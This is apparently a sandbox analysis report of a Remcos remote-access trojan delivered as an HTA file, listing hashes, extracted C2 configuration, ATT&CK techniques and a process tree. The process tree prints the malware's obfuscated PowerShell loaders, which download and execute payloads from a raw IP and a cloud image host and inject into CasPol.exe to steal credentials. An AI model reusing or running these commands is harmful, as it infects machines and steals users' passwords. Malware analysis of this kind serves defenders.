remcos | 42b3442bc675f7ff95d660935ea8756710fea99551b1d614f2e8b7db739d72a0

Analysis

max time kernel
148s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
28-01-2025 08:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

greatturningpointofentirelifegivenmebestthingsforgetbacktome.hta
Size

252KB
MD5

9fb8a902f8fed32164687eacbc011faa
SHA1

7e2c1b3241c142946709366d053a0a458dcb6b3f
SHA256

42b3442bc675f7ff95d660935ea8756710fea99551b1d614f2e8b7db739d72a0
SHA512

3de9bde1a8ed6d6b974e541241009e2c18ed74d9ce777129d59a0c5df0306a6494d02b212a651769ce523b8d14da20f1f8d2774508e6979daeee79e883d2c4aa
SSDEEP

768:PD2dFEfY7Xw8LcGdgtF/UT1JrXkUBDbzuJqAakf4vlOGd5cqjk1FJZuO+yIF9OQ5:NzNtyht97

Score

10^/10

remcos zynova collection defense_evasion discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

zynova

newbigupdateforme.duckdns.org:14646

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-ID1P7W
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/3028-103-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/1064-109-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/2368-102-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/3028-103-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/2368-102-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 3 IoCs

flow	pid	Process
13	4780	powershell.exe
18	220	powershell.exe
19	220	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
3928	cmd.exe
4780	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	CasPol.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
220	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 220 set thread context of 388	220	powershell.exe	95
PID 388 set thread context of 2368	388	CasPol.exe	99
PID 388 set thread context of 3028	388	CasPol.exe	102
PID 388 set thread context of 1064	388	CasPol.exe	103

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
4780	powershell.exe
4780	powershell.exe
220	powershell.exe
220	powershell.exe
220	powershell.exe
220	powershell.exe
2368	CasPol.exe
2368	CasPol.exe
1064	CasPol.exe
1064	CasPol.exe
2368	CasPol.exe
2368	CasPol.exe

Suspicious behavior: MapViewOfSection 6 IoCs

pid	Process
388	CasPol.exe
388	CasPol.exe
388	CasPol.exe
388	CasPol.exe
388	CasPol.exe
388	CasPol.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4780	powershell.exe
Token: SeDebugPrivilege	220	powershell.exe
Token: SeDebugPrivilege	1064	CasPol.exe

Suspicious use of WriteProcessMemory 55 IoCs

description	pid	Process	procid_target
PID 3284 wrote to memory of 3928	3284	mshta.exe	82
PID 3284 wrote to memory of 3928	3284	mshta.exe	82
PID 3284 wrote to memory of 3928	3284	mshta.exe	82
PID 3928 wrote to memory of 4780	3928	cmd.exe	84
PID 3928 wrote to memory of 4780	3928	cmd.exe	84
PID 3928 wrote to memory of 4780	3928	cmd.exe	84
PID 4780 wrote to memory of 1524	4780	powershell.exe	85
PID 4780 wrote to memory of 1524	4780	powershell.exe	85
PID 4780 wrote to memory of 1524	4780	powershell.exe	85
PID 1524 wrote to memory of 3172	1524	csc.exe	86
PID 1524 wrote to memory of 3172	1524	csc.exe	86
PID 1524 wrote to memory of 3172	1524	csc.exe	86
PID 4780 wrote to memory of 3620	4780	powershell.exe	87
PID 4780 wrote to memory of 3620	4780	powershell.exe	87
PID 4780 wrote to memory of 3620	4780	powershell.exe	87
PID 3620 wrote to memory of 220	3620	WScript.exe	88
PID 3620 wrote to memory of 220	3620	WScript.exe	88
PID 3620 wrote to memory of 220	3620	WScript.exe	88
PID 220 wrote to memory of 4964	220	powershell.exe	92
PID 220 wrote to memory of 4964	220	powershell.exe	92
PID 220 wrote to memory of 4964	220	powershell.exe	92
PID 220 wrote to memory of 2268	220	powershell.exe	94
PID 220 wrote to memory of 2268	220	powershell.exe	94
PID 220 wrote to memory of 2268	220	powershell.exe	94
PID 220 wrote to memory of 388	220	powershell.exe	95
PID 220 wrote to memory of 388	220	powershell.exe	95
PID 220 wrote to memory of 388	220	powershell.exe	95
PID 220 wrote to memory of 388	220	powershell.exe	95
PID 220 wrote to memory of 388	220	powershell.exe	95
PID 220 wrote to memory of 388	220	powershell.exe	95
PID 220 wrote to memory of 388	220	powershell.exe	95
PID 220 wrote to memory of 388	220	powershell.exe	95
PID 220 wrote to memory of 388	220	powershell.exe	95
PID 220 wrote to memory of 388	220	powershell.exe	95
PID 388 wrote to memory of 2400	388	CasPol.exe	98
PID 388 wrote to memory of 2400	388	CasPol.exe	98
PID 388 wrote to memory of 2400	388	CasPol.exe	98
PID 388 wrote to memory of 2368	388	CasPol.exe	99
PID 388 wrote to memory of 2368	388	CasPol.exe	99
PID 388 wrote to memory of 2368	388	CasPol.exe	99
PID 388 wrote to memory of 2368	388	CasPol.exe	99
PID 388 wrote to memory of 3256	388	CasPol.exe	100
PID 388 wrote to memory of 3256	388	CasPol.exe	100
PID 388 wrote to memory of 3256	388	CasPol.exe	100
PID 388 wrote to memory of 3148	388	CasPol.exe	101
PID 388 wrote to memory of 3148	388	CasPol.exe	101
PID 388 wrote to memory of 3148	388	CasPol.exe	101
PID 388 wrote to memory of 3028	388	CasPol.exe	102
PID 388 wrote to memory of 3028	388	CasPol.exe	102
PID 388 wrote to memory of 3028	388	CasPol.exe	102
PID 388 wrote to memory of 3028	388	CasPol.exe	102
PID 388 wrote to memory of 1064	388	CasPol.exe	103
PID 388 wrote to memory of 1064	388	CasPol.exe	103
PID 388 wrote to memory of 1064	388	CasPol.exe	103
PID 388 wrote to memory of 1064	388	CasPol.exe	103

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greatturningpointofentirelifegivenmebestthingsforgetbacktome.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3284
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c powERshELl.exe -EX byPasS -NoP -w 1 -C deVICECrEDentIaLDePLOYmEnt.EXe ; iEx($(iEX('[sYsTEM.texT.EnCodiNG]'+[chAr]58+[Char]0x3A+'utF8.gEtSTRINg([syStEm.coNVert]'+[ChAR]0x3A+[CHAr]58+'froMBaSE64StrIng('+[Char]0X22+'JEFFbFNEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbWJFUkRFZklOaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0dIWGhOYlBWTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXNTVlVJTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdmEsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUUdtYU55UWR2cixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQk5yaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiU3dhYVJhV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1Fc1BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBRWxTRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEzNS4xMjUuMjQ2LjU0L3hhbXBwL25jby9uaWNldG9nZXRtZWJlc3R0aGluZ3N3aXRoZ3JlYXRuYmVzdHRoaW5nc2lnb3Rmcm9tZXZlcnkuZ0lGIiwiJEVudjpBUFBEQVRBXG5pY2V0b2dldG1lYmVzdHRoaW5nc3dpdGhncmVhdG5iZXN0dGhpbmdzaWdvdGZyb21ldmVyLnZicyIsMCwwKTtTdGFSVC1TTEVlcCgzKTtpTlZvS0UtRVhQUmVzc2lPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXG5pY2V0b2dldG1lYmVzdHRoaW5nc3dpdGhncmVhdG5iZXN0dGhpbmdzaWdvdGZyb21ldmVyLnZicyI='+[cHar]34+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3928
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powERshELl.exe -EX byPasS -NoP -w 1 -C deVICECrEDentIaLDePLOYmEnt.EXe ; iEx($(iEX('[sYsTEM.texT.EnCodiNG]'+[chAr]58+[Char]0x3A+'utF8.gEtSTRINg([syStEm.coNVert]'+[ChAR]0x3A+[CHAr]58+'froMBaSE64StrIng('+[Char]0X22+'JEFFbFNEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbWJFUkRFZklOaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0dIWGhOYlBWTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXNTVlVJTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdmEsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUUdtYU55UWR2cixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQk5yaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiU3dhYVJhV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1Fc1BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBRWxTRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEzNS4xMjUuMjQ2LjU0L3hhbXBwL25jby9uaWNldG9nZXRtZWJlc3R0aGluZ3N3aXRoZ3JlYXRuYmVzdHRoaW5nc2lnb3Rmcm9tZXZlcnkuZ0lGIiwiJEVudjpBUFBEQVRBXG5pY2V0b2dldG1lYmVzdHRoaW5nc3dpdGhncmVhdG5iZXN0dGhpbmdzaWdvdGZyb21ldmVyLnZicyIsMCwwKTtTdGFSVC1TTEVlcCgzKTtpTlZvS0UtRVhQUmVzc2lPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXG5pY2V0b2dldG1lYmVzdHRoaW5nc3dpdGhncmVhdG5iZXN0dGhpbmdzaWdvdGZyb21ldmVyLnZicyI='+[cHar]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4780
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bngpx0g3\bngpx0g3.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1524
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA49C.tmp" "c:\Users\Admin\AppData\Local\Temp\bngpx0g3\CSC68F7764E24CC40AE97B5F244B36CDC9.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3172
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicetogetmebestthingswithgreatnbestthingsigotfromever.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3620
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnACMAeAAjAC4AcwBnAG4AaQBoACMAIwBzAGUAYgBlAG0AZQBzAG8AcgBmAG8AbABsAGkAawBzAGUAYwBpAG4ALwBvAGMAbgAvAHAAcABtAGEAeAAvADQANQAuADYANAAyAC4ANQAyADEALgA1ADMAMQAvAC8AOgBwACMAIwBoACcAOwAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACAAPQAgACQAbwByAGkAZwBpAG4AYQBsAFQAZQB4AHQAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGkAbQBhAGcAZQBVAHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAcwAuAGMAbABvAHUAZABpAG4AYQByAHkALgBjAG8AbQAvAGQAYQB4AHcAdQBhADYAMwB5AC8AaQBtAGEAZwBlAC8AdQBwAGwAbwBhAGQALwB2ADEANwAzADgAMAAwADgAMAA5ADgALwBlAGYAcABxAG4AdgBoADgAeAB4AG4AMQBjAGQAMwB2AHEAbABiAGQALgBqAHAAZwAnADsAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAaQBtAGEAZwBlAFUAcgBsACkAOwAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQARgBsAGEAZwApADsAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7ACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwAkAHQAeQBwAGUAIAA9ACAAWwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAVgBBAEkAJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIABAACgAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAsACcAJwAsACcAJwAsACcAJwAsACcAQwBhAHMAUABvAGwAJwAsACcAJwAsACcAJwAsACcAJwAsACcAJwAsACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAJwAsACcAdABvAHIAcgBvAG4AdABlAHMAJwAsACcAdgBiAHMAJwAsACcAMQAwADAAJwAsACcAMQAnACwAJwBwAHMAZQB1AGQAbwBtAGUAcgB5ACcAKQApAA==')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:220
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\torrontes.vbs"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4964
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        
        PID:2268
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:388
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\iygltpi"
        7⤵
        
        PID:2400
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\iygltpi"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2368
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\ltmetasbvgg"
        7⤵
        
        PID:3256
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\ltmetasbvgg"
        7⤵
        
        PID:3148
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\ltmetasbvgg"
        7⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:3028
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\vnrousdujoyqeu"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1064

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
af951969331ab70de3939a449619c986

SHA1
003ed1dae8db5273f17aaa503a68f25d7f87508d

SHA256
0959fa4f10487c3da812100d4c73543e7e0da3d5b66748845c60508d31a309dc

SHA512
a3b1dccfc4e25c5b48d5af00f68f833183c918069bf91d3077e9e20102ed642a4ab77a81ac1529f14e85ff26e1e6fe72e5b2ac56f42eecee83bf734f8eb93964

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA49C.tmp

Filesize
1KB

MD5
77e7c8f38601bc4fe928e69105a482e3

SHA1
2bf05fe9f9fe3277fdfa653908d98178464b4cbf

SHA256
1b1378ab4fbf851d11ec3198a3f908cb1986056eb6aee293679cb12d0bbb0125

SHA512
5d4ada1f7120e16e8193704df9fee6b46d37c0958ad6e8c994eaf71bcd1bbc4fce6fc9f5c5cdc489a74c42e9ee9523356bfe812db85ca270892ebb5b21a0186d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dupwky41.bes.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bngpx0g3\bngpx0g3.dll

Filesize
3KB

MD5
3e02229a544d719cba1cea8d9967dcc1

SHA1
60d314e9c0e4d61fa7783f47a12b1ea9593217c6

SHA256
cac72254c920f6e110a3167712f19c519e9f60061b32e8b7e6206e848408571d

SHA512
771dc56dcd8b88356a1020986dc4bd4c46613aaaea8ef4f966c34e754111c6d32276487cc51d07fa75b7e0a47c19ca782abc78c56805d038ba93fbdb801af52e

Download Submit
C:\Users\Admin\AppData\Local\Temp\iygltpi

Filesize
4KB

MD5
f1d2c01ce674ad7d5bad04197c371fbc

SHA1
4bf0ed04d156a3dc6c8d27e134ecbda76d3585aa

SHA256
25b006032deccd628940ef728fffe83b325a85de453a34691f55f570e4460094

SHA512
81cb982cc33dcc27600a8a681c3ec3cc5b9221b95baa45e1ab24479745a9638b9f31d7beeeb1128b3294ff69b44e958c75e25d565f66790c364665caff96ee77

Download Submit
C:\Users\Admin\AppData\Roaming\nicetogetmebestthingswithgreatnbestthingsigotfromever.vbs

Filesize
236KB

MD5
ff09c5a85cbd9857d9421bc214ec2fe1

SHA1
074bf8a3172008654a2541b851bf4590cd5ef216

SHA256
8c8eea1183ab058182154e705f9a518e4950cbd9b7de8c787e5e943f57aee3ca

SHA512
1a7769ba52d3bc4ecaf7d935656af12bf54f1b4f2bcf8dea9c9c50d6ea7dc261fb45f91ab7a1ff9e186b6db0df3330ca2ccfa66ed4811f4acbb07f980663f3eb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bngpx0g3\CSC68F7764E24CC40AE97B5F244B36CDC9.TMP

Filesize
652B

MD5
8d5ce28796333148ebad33af7470ce1b

SHA1
24737c9cadd44c3b16ae114e3efd291baface95f

SHA256
ea3192509c1c0df77f2c70e7cc38f0fcb6f3a86bcb14b3917f64f8bc1d987dff

SHA512
582451746cd1b9a573492ef53ec64366cb7da7e23ec871289dc7c6575e1826a2f54bcf21db6105cae9a0ad250c8406addde0eabefaee5b7a38c9f410573deabc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bngpx0g3\bngpx0g3.0.cs

Filesize
482B

MD5
